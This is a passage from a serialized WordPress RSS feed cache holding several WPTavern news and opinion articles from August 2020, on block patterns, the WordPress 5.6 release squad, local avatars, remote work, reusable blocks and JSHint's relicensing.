One adds a sidebar on the left and the other pattern adds it to the right. Both patterns have a main column for adding custom content. The sidebar column is decorated with widget-type blocks by default.</p>\n\n\n\n<img />Inclusive theme pattern with sidebar and content columns.\n\n\n\n<p>What makes these patterns unique is that they are almost like a stepping stone toward full-site editing &mdash; all that they are missing is a header and footer. Admittedly, I was unprepared for this sort of pattern and expected patterns to be used for smaller sections, but I am a fan of the experimentation in the Inclusive theme.</p>\n\n\n\n<p>Nymark has two of the current three themes with block patterns in the directory. Her <a href=\"https://wordpress.org/themes/deejay/\">Deejay</a> theme adds a single pattern, which allows the user to create a DJ profile section on their site. It combines columns, social icons, the latest posts list, a video embed, and more.</p>\n\n\n\n<img />Deejay theme profile pattern.\n\n\n\n<p>Overall, I like the early exploration of this new feature. It is never easy being the first to try things out, so I applaud the theme authors for paving the way. We&rsquo;re only a week into the WordPress 5.5 release, but I am excited to see more.</p>\n\n\n\n<h2>How Well Do Patterns Transfer Between Themes?</h2>\n\n\n\n<p class=\"has-drop-cap\">One of the promises of the block system is that it allows users to switch between themes and maintain their content. The idea is that each theme will style all the blocks in such a way that the front end output does not look broken.</p>\n\n\n\n<p>While there is merely a small sample size of three themes, I did hit some content styling issues when switching between them.</p>\n\n\n\n<p>Generally, the more complex a pattern and whether the pattern employs custom classes decides how well it would transfer from theme to theme. Images could present an interesting problem too if the user decides to not replace a pattern&rsquo;s image with its own. Because the image would exist in the theme folder, if the theme is deactivated and uninstalled, it would no longer exist.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 17 Aug 2020 21:24:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: WordPress 5.6 Development Kicks Off with All-Women Release Squad\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103314\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:193:\"https://wptavern.com/wordpress-5-6-development-kicks-off-with-all-women-release-squad?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-5-6-development-kicks-off-with-all-women-release-squad\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4051:\"<img />photo credit: <a href=\"https://stocksnap.io/photo/people-girls-N444PJYUP9\">Brodie Vissers</a>\n\n\n\n<p>WordPress 5.5 has already been downloaded more than 4 million times after its release earlier this week, and it&rsquo;s time to <a href=\"https://make.wordpress.org/core/2020/08/13/wordpress-5-6-release-planning/\">kick off work on 5.6</a>. Josepha Haden will be leading the release alongside coordinator Dee Teal, with additional leads for Triage (Tonya Mork), Core Tech (Helen Hou-Sand&igrave;), Editor Tech (Isabel Brison), Design (Ellen Bauer and Tammie Lister), and several more women managing documentation, accessibility, marketing, testing, and other important aspects of the release. The full squad includes 46 women so far with a couple of roles left to be decided.</p>\n\n\n\n<p>When Josepha Haden officially <a href=\"https://make.wordpress.org/core/2020/03/11/all-women-release-squad/\">proposed</a> the idea of having an all-women release squad, she emphasized that this doesn&rsquo;t mean the release can only include contributions from women. In addition to the general objective of shipping a stable and enhanced version of the WordPress, Haden outlined a few more goals for this historic release:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>My hope is that with a release squad comprised entirely of people who identify as women, we&rsquo;ll be able to increase the number women who have that experience and (hopefully) become returning contributors to&nbsp;Core&nbsp;and elsewhere. This doesn&rsquo;t mean the release will only contain contributions from women. And if our current squad training process is any indication, it also doesn&rsquo;t mean that we&rsquo;re asking a squad to show up and do this without support.</p></blockquote>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/francina/\">Francesca Marano</a>, who worked as release <a href=\"https://wptavern.com/a-non-technical-release-leads-journey-to-becoming-a-mentor-for-wordpress-core-development\">co-lead for WordPress 5.3</a>, published a post announcing the squad as well as the scope of the release. Two major items are already complete: <a href=\"https://github.com/WordPress/gutenberg/issues/13204\">conversion of the widget-editing areas</a> and removal of support for PHP 5.6.x. The squad plans to deliver an impressive array of new features that are still in development:</p>\n\n\n\n<ul><li>Navigation menus&nbsp;block&nbsp;in Core</li><li>Automatic updates for major WordPress Core releases (opt-in)</li><li>New features from the block editor upgrades.</li><li>Widgets-editing and&nbsp;Customizer&nbsp;support in Core</li><li>Default theme, including an FSE compatible version</li><li>PHP 8 support</li><li>Public&nbsp;beta&nbsp;of Full Site Editing</li></ul>\n\n\n\n<p>A recent <a href=\"https://twitter.com/kaydacode/status/1293302599542874177\">tweet</a> from a woman who works as an iOS developer at Quicken Loans, asked if there have ever been women in software development working in leadership roles. Although many projects and organizations have women in such roles for many years (as seen in the replies to the tweet), the question demonstrates why representation still matters. WordPress 5.6 is an opportunity to make many more women leaders visible for people who need to see others like themselves in leadership roles.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Lead developer for 38% of the internet let&rsquo;s goooooo who else is out there <a href=\"https://t.co/bCq8iFdf3I\">https://t.co/bCq8iFdf3I</a></p>&mdash; Helen &#20399;-Sand&iacute; (@helenhousandi) <a href=\"https://twitter.com/helenhousandi/status/1293621808088985602?ref_src=twsrc%5Etfw\">August 12, 2020</a></blockquote>\n</div>\n\n\n\n<p>So far the community has been very <a href=\"https://twitter.com/SergeyBiryukov/status/1294324969133035522\">supportive</a> of the plan for an all-women release squad and is rallying around the idea. WordPress 5.6 is the last release planned for the year and is expected to land on December 8, 2020. </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Aug 2020 22:17:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"WPTavern: Local Avatars in WordPress? Yes, Please\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103361\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:139:\"https://wptavern.com/local-avatars-in-wordpress-yes-please?utm_source=rss&utm_medium=rss&utm_campaign=local-avatars-in-wordpress-yes-please\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5442:\"<p class=\"has-drop-cap\">It is an age-old question. OK, well, it&rsquo;s really a <a href=\"https://core.trac.wordpress.org/ticket/16020\">10-year-old feature request</a>, but that is <em>age-old</em> in software development years. Should WordPress have a local avatar system?</p>\n\n\n\n<p>Let&rsquo;s be honest. Most of us have kind of gritted our teeth and quietly &mdash; and sometimes not so quietly &mdash; lived with the Automattic-owned properties that are integrated directly with the core WordPress software. At least Akismet is a plugin and somewhat detached from the platform. But, avatars, a feature courtesy of Automattic&rsquo;s Gravatar service, is baked deep into the platform. Users must disable avatars completely or opt into another plugin to distance themselves from it.</p>\n\n\n\n<p>There are the obvious privacy concerns that some people have around uploading an image to the Gravatar service and creating an account with WordPress.com. Even aside from such concerns, regardless of whether they are warranted, new users who are unfamiliar with local avatar plugins are essentially guided to create an account with a third-party service to have one of the most basic features expected from a CMS.</p>\n\n\n\n<p>Not all WordPress installs have access to Gravatar, such as within companies that use intranets. Some countries have the power to effectively block access to the service, as shown by the move China made in 2013 to <a href=\"https://wptavern.com/china-blocks-gravatar-and-wordpress-com-how-to-adjust-wordpress-settings\">block WordPress.com and Gravatar</a>, leaving users to seek out alternatives.</p>\n\n\n\n<p>The itch that many want to scratch is to simply remove Automattic-connected services from the core software. Gravatar&rsquo;s inclusion in WordPress has hampered any chance of competing services gaining a foothold. To be fair, at the time of Gravatar&rsquo;s initial inclusion in WordPress, there were few good options. It made sense to leverage a working solution that would get an avatar system rolling. And the notion of a globally-recognized avatar is noble &mdash; one service to control your avatar across the web. However, having that service under the control of a for-profit U.S. company will always be an issue that could potentially hold it back from being the service that the web truly needs. It will certainly always be a contentious issue in the WordPress community. Even those of us who love the software and services that Automattic offers can see the problem.</p>\n\n\n\n<p>WordPress should be agnostic about what services it includes out of the box. Gravatar should be a separate plugin, even if it is bundled with core <em>a la</em> Akismet. Local avatars is not an insurmountable feature, and it might just be time to make the change.</p>\n\n\n\n<p>While possible to build into core, it is not a simple matter of plugging in an image upload form on the user profile screen. The feature carries its own privacy concerns too. For example, uploading images currently requires certain permissions that would also provide the user with access to the entire media library. There is the question of how to deal with registered vs. non-registered users in such a system along with several other hurdles.</p>\n\n\n\n<p>Recent chatter in the 10-year-old ticket and the #core-privacy and #core-media Slack channels have <a href=\"https://wordpress.slack.com/archives/C9695RJBW/p1593630901357300\">reignited the idea of local avatars</a>.  There is also an <a href=\"https://docs.google.com/spreadsheets/d/172jXhfzVFfKfk8M4NXa3e29GlQhZpAaWSxZCrH07_fo/edit#gid=0\">early spreadsheet</a> on local avatar requirements and research.</p>\n\n\n\n<p>Much of this discussion is amidst the backdrop of the <a href=\"https://make.wordpress.org/core/2020/04/01/feature-plugin-proposal-wp-consent-api/\">WP Consent API</a> proposal, which seeks to create a standardized method for core, plugins, and themes to obtain consent from users. Presumably, Gravatar usage would tie into this API somehow.</p>\n\n\n\n<p>Matt Mullenweg, the co-founder of WordPress and CEO of Automattic, seems open to the discussion. &ldquo;It&rsquo;s exciting to see this older ticket picking up so much steam,&rdquo; he said <a href=\"https://core.trac.wordpress.org/ticket/16020#comment:120\">on the Trac ticket</a>. However, he further pushed for a separate featured plugin that focused on broader privacy concerns.</p>\n\n\n\n<p>In many ways, local avatars feel like the early days of the web in which users had to upload a custom avatar to every single website they joined. At times, it could be tedious. Gravatar solved this issue by creating a single service for people to bring their avatars along their journey across the net. However, we have seemingly come full circle in the last few years. With the passage of the European GDPR and other jurisdictions beginning to follow suit with similar privacy laws, it easy to see why there is renewed discussion around Gravatar in core.</p>\n\n\n\n<p>We should have local avatars because it is the right thing to do. Provide a basic avatar upload system on the user profile screen. Beyond that, let users choose what they want by installing their preferred plugin without guiding them toward one particular service over another.</p>\n\n\n\n<p>If nothing else, I&rsquo;m excited about a wider discussion around local avatars in WordPress and welcome the possibility of such a featured explored via an officially-sanctioned plugin.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Aug 2020 21:58:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: Struggles of Remote Work Half a Year Into the Pandemic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:173:\"https://wptavern.com/struggles-of-remote-work-half-a-year-into-the-pandemic?utm_source=rss&utm_medium=rss&utm_campaign=struggles-of-remote-work-half-a-year-into-the-pandemic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6007:\"<p class=\"has-drop-cap\">This was supposed to be the year that ushered in a revolution in how we work. Remote jobs would become a common practice, spurred on by the global COVID-19 pandemic. A time when everyone would start paying attention to those <em>radical</em> ideas from <a href=\"https://www.nytimes.com/2020/07/12/business/matt-mullenweg-automattic-corner-office.html\">remote work evangelists</a> such as Matt Mullenweg.</p>\n\n\n\n<p>The question is whether this pandemic was the catalyst the world needed to reevaluate the workplace.</p>\n\n\n\n<p>There is certainly a lot of good we can talk about. No hour-long commutes. Saved money by eating at home instead of takeout from the restaurant across the street. More flexible hours.</p>\n\n\n\n<p>As a veteran and evangelist of the remote work movement, I have not dealt with many of the struggles that others have during this stretch. While I have had to adjust to the outside world a bit, for the most part, my day-to-day life has remained the same. I had the knowledge that colleagues, friends, and family were having some growing pains with the new reality. However, I never understood what they were going through.</p>\n\n\n\n<p>Last week, I nearly reached my breaking point. It was one of those times where reality decided to check in. The beautiful veneer hanging over a decade of remote work was stripped away. It was a time where I truly understood what others had been going through during this worldwide period of struggle.</p>\n\n\n\n<p>One of my housemates tested positive for COVID-19 a week earlier. He had a short battle with a fever a few days before, but that was the scope of sickness within the household. My other two housemates and I tested negative and have been doing fine to this point. As frightening as those few days were (<em>Will my friend be OK? Am I going to get sick?</em>), I was unprepared for what this change meant within our household.</p>\n\n\n\n<p>That one little test upended our routines and took its toll on my work life.</p>\n\n\n\n<p>It meant two weeks of continual interruptions from people who are not accustomed to being under quarantine. While everyone did their best, it was not an ideal situation. I could hunker down in my own space, but the routine that typically drives my life was shattered. For those of us routine-oriented people, even the smallest interruptions can feel like a freight train chugging by with the sole intent of ruining an otherwise peaceful day.</p>\n\n\n\n<p>For most of my professional life, I have worked alone in quiet. I might put on some music or a podcast, mostly as a calming bit of background noise. However, I tend to enjoy being alone with my thoughts and the occasional interruption of a cat jumping in my lap for its daily petting.</p>\n\n\n\n<p>The two-week disruption of my life, while unpleasant, was a mere blip in comparison to the struggle that many others have endured and overcome for the past five or six months. However, it has allowed me to become more empathetic when hearing others&rsquo; stories. From disruptions on Zoom meetings of children zipping through the house to the family dog begging for playtime in the middle of the day, work has taken on a new meaning for many. And, this is true for remote workers within the WordPress community.</p>\n\n\n\n<p>The pandemic has certainly thrust companies and their employees into remote work. However, I question whether it was the push the world needed to reevaluate the workplace. It is not something that grew organically. It forced people into situations they were unprepared for. Some did not miss a beat. Others are still attempting to <a href=\"https://wptavern.com/finding-balance-in-these-uncertain-times-remote-work-and-sharing-our-struggles\">find balance</a>.</p>\n\n\n\n<p>Many of us with years of experience have run into issues. A large portion of the WordPress community works remotely. Some are new to it, and many who have years of experience are learning to cope with changes to their environment.</p>\n\n\n\n<p>Mullenweg realizes this is not the best of times, even within an established distributed company such as Automattic.  &ldquo;I believe that if you do distributed work well, you&rsquo;re a lot more productive,&rdquo; he said in <a href=\"https://www.nytimes.com/2020/07/12/business/matt-mullenweg-automattic-corner-office.html\">Corner Office interview</a> for the New York Times.  &ldquo;But the pandemic has affected a lot of people&rsquo;s lives. School is canceled. People are working from home that might not normally work from home. So we definitely have seen a hit to productivity, not to mention the stress, which has been even compounded by the social unrest.&rdquo;</p>\n\n\n\n<p>I am still an evangelist for remote work. Outside of potentially teaching schoolchildren once again (perhaps in the far, far away future), I can hardly imagine moving to an office away from home anytime soon. However, I can see how being propelled into an unfamiliar environment will not sit well with some. This experience in remote work may even turn away those who would have otherwise been comfortable had they been given the opportunity outside of the chaos of kids, spouses, housemates, and all the other distractions. That old, familiar cubicle may be enticing at this point.</p>\n\n\n\n<p>I am happy that this pandemic will make for some converts to remote work but worry that others have not been given a fair look at the benefits that might exist under normal circumstances.</p>\n\n\n\n<p>This post is in part sharing my struggles with remote work and part an open invitation for members of our community to talk about their experiences over the past several months.  This is me checking in with you, our dear readers.  How are you coping today?</p>\n\n\n\n<p>For people who are struggling but are not comfortable discussing issues related to remote work openly in the comments, please check out <a href=\"https://www.bigorangeheart.org/\">Big Orange Heart</a>, an organization dedicated to supporting the well-being of remote workers.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Aug 2020 22:27:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: Convert Reusable Blocks to Block Patterns with 1-Click\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103302\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:173:\"https://wptavern.com/convert-reusable-blocks-to-block-patterns-with-1-click?utm_source=rss&utm_medium=rss&utm_campaign=convert-reusable-blocks-to-block-patterns-with-1-click\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5063:\"<p>Now that <a href=\"https://wptavern.com/wordpress-5-5-eckstine-introduces-block-directory-block-patterns-and-automatic-updates-for-themes-and-plugins\">WordPress 5.5</a> has shipped, block patterns are available in core for all users. If you have previously been relying on reusable blocks but prefer the flexibility of block patterns, you may want to convert these. </p>\n\n\n\n<p>WordPress core developer Jean-Baptiste Audras has made this possible in the latest update of his <a href=\"https://wordpress.org/plugins/reusable-blocks-extended/\">Reusable Blocks Extended</a> plugin. He posted a video demo of how the plugin converts reusable blocks to block patterns with one click.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Update! &#128165; My Reusable Blocks Extended <a href=\"https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw\">#WordPress</a> plugin now allows users to convert reusable blocks to block patterns in one click &#10024;<br />Just hit the conversion button and your reusable blocks will be automagically converted &#128526;<br />See the 1min-demo below &#128071;<a href=\"https://twitter.com/hashtag/WP55?src=hash&ref_src=twsrc%5Etfw\">#WP55</a> <a href=\"https://twitter.com/hashtag/Gutenberg?src=hash&ref_src=twsrc%5Etfw\">#Gutenberg</a> <a href=\"https://t.co/YDBaxnA8Nw\">pic.twitter.com/YDBaxnA8Nw</a></p>&mdash; Jb Audras (@AudrasJb) <a href=\"https://twitter.com/AudrasJb/status/1293673870210338821?ref_src=twsrc%5Etfw\">August 12, 2020</a></blockquote>\n</div>\n\n\n\n<h3>What&rsquo;s the difference between reusable blocks and block patterns?</h3>\n\n\n\n<p>Why might you want to convert your reusable blocks to block patterns? For users who are new to the concept, there are a few distinctions between these similar features.</p>\n\n\n\n<p>Reusable blocks were designed to be a time-saving feature that allows users to save a block or group of blocks for use on other posts or pages. They can be edited but they have a certain distinction in that they are intended to look the same in all places they are used. Any changes made to a reusable block will apply to all instances of the block wherever it is used.</p>\n\n\n\n<p>If a user wanted to make changes to a reusable block specific to one page, the process would involve clicking on the block&rsquo;s properties and selecting &ldquo;convert to regular block,&rdquo; which would ensure that all edits would appear only on that specific instance of the block. It&rsquo;s unlikely that most users would know how to do this without help, so this is one of the drawbacks of reusable blocks.</p>\n\n\n\n<p>Block patterns are predefined block layouts that are designed to be changed. Once a pattern is inserted into the content, users can customize with their own text, images, alignments, colors, additional blocks, etc. The options are limitless and any changes made are not saved back to the original pattern. Block patterns provide a flexible starting point that gives users an idea of how blocks can be combined to make attractive layouts.</p>\n\n\n\n<h3>User-Created Patterns Are Coming Soon to the Block Pattern Builder Plugin</h3>\n\n\n\n<p>At the moment, users can create their own reusable blocks but not their own block patterns. Patterns have to be <a href=\"https://developer.wordpress.org/block-editor/developers/block-api/block-patterns/\">registered with code</a> in order to appear in the pattern library. This is another reason that Audras&rsquo; one-click conversion is quite useful for users who are limited to capabilities offered in the editor&rsquo;s current UI. </p>\n\n\n\n<p>The ability to create block patterns inside the editor should be a feature in core. It would enable non-technical users to share their designs and creations in a more flexible format than reusable blocks provide. Until this feature is added to core &ndash; and it isn&rsquo;t a guarantee- there is a plugin for that. </p>\n\n\n\n<p>Justin Tadlock&rsquo;s <a href=\"https://wordpress.org/plugins/block-pattern-builder/\">Block Pattern Builder</a> plugin, which is available on WordPress.org, will soon be merging a pull request that <a href=\"https://github.com/justintadlock/block-pattern-builder/pull/2\">adds the option to create block patterns inside the editor</a>. It will work in a similar way to the process of adding reusable blocks. Now that block patterns are available in WordPress 5.5, this feature will be more useful to a wide range of users.</p>\n\n\n\n<p>Audras&rsquo; <a href=\"https://wordpress.org/plugins/reusable-blocks-extended/\">Reusable Blocks Extended</a> plugin, like many other amazing utilities for the editor, might be difficult to find unless you already know exactly what to search. Many times users are not even aware of the possibility of converting reusable blocks to patterns.  This might also make a useful core feature but doesn&rsquo;t seem likely to be a high priority at the moment. In the meantime, watch for more plugins to start extending block patterns to do interesting things now that they are available in core WordPress.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Aug 2020 22:12:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: JSHint is Now Free Software after Updating License to MIT Expat\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103245\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:191:\"https://wptavern.com/jshint-is-now-free-software-after-updating-license-to-mit-expat?utm_source=rss&utm_medium=rss&utm_campaign=jshint-is-now-free-software-after-updating-license-to-mit-expat\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4759:\"<p>The world of open source tooling has expanded to welcome <a href=\"https://jshint.com/\">JSHint</a>, as the project&rsquo;s maintainers have finally completed the necessary work to adopt the MIT Expat license. Previously, the JavaScript linter&rsquo;s code was partially published under the JSON license, with an additional seemingly innocuous clause that stated: &ldquo;The Software shall be used for Good, not Evil.&rdquo; This clause prevented it from being recognized by FSF as <a href=\"http://www.gnu.org/licenses/license-list.html\">a free software license</a> and similarly was not recognized as <a href=\"https://opensource.org/licenses/alphabetical\">open source</a> by the Open Source Initiative.</p>\n\n\n\n<p>In an essay titled <a href=\"http://mikepennisi.com/blog/2020/jshint-watching-the-ship-sink/\">Watching the Ship Sink</a>, JSHint co-maintainer Mike Pennisi describes how the license hurt the project. Despite having captured the distinction of being the most popular JavaScript linter in 2015, the tool has been brutally outpaced during the past five years by its contemporary, ESLint, largely due to the effects of having non-free licensing.</p>\n\n\n\n<img />credit: Mike Pennisi\n\n\n\n<p>&ldquo;Legally-conscious objectors aren&rsquo;t betraying their own dastardly motivations; they&rsquo;re refusing to enter into an ambiguous contract,&rdquo; Pennisi said. &ldquo;Put differently: they&rsquo;re not saying, &lsquo;I&rsquo;m an evildoer,&rsquo; they&rsquo;re saying, &lsquo;I don&rsquo;t understand what you want.&rsquo; This consideration disqualified JSHint from inclusion in all sorts of contexts.&rdquo;</p>\n\n\n\n<p>Licensing concerns prevented developers from the Debian and Fedora GNU/Linux distributions from including JSHint. Pennisi even dips into a bit of WordPress history, when he detailed how programming platforms that &ldquo;repackaged&rdquo; JSHint&nbsp;also reconsidered due to its additional clause.</p>\n\n\n\n<p>&ldquo;There was a time when the popular content management system WordPress repackaged JSHint in this way,&rdquo; he said. &ldquo;Once they learned of the JSON license, they replaced JSHint in a matter of weeks.&rdquo; Pennisi referenced a <a href=\"https://core.trac.wordpress.org/ticket/42850\">ticket</a> for WordPress 4.9 wherein JSHint was <a href=\"https://make.wordpress.org/core/2018/01/24/jshint-removed-from-codemirror-in-4-9-3/\">removed from core&rsquo;s implementation of CodeMirror</a>, as well as WordPress&rsquo; build tools. </p>\n\n\n\n<p>&ldquo;When a project like JSHint loses users, it also loses contributors,&rdquo; Pennisi said. &ldquo;This slows the addition of new features and the correction of bugs. Timeliness is important for these things, and people perceive delays very negatively. The best example of this comes from JSHint&rsquo;s delayed support for async functions.&rdquo;</p>\n\n\n\n<p>JSHint had become what Pennisi described as a &ldquo;bizarrely-encumbered JavaScript linter.&rdquo; Unfortunately, the process of going open source after seven years was not as simple as submitting a pull request for a license change. In a <a href=\"http://mikepennisi.com/blog/2020/you-may-finally-use-jshint-for-evil/\">series of essays</a>, he unfolds the grueling process of requesting permission from all of the project&rsquo;s 200+ contributors, only to end up receiving one refusal and some who 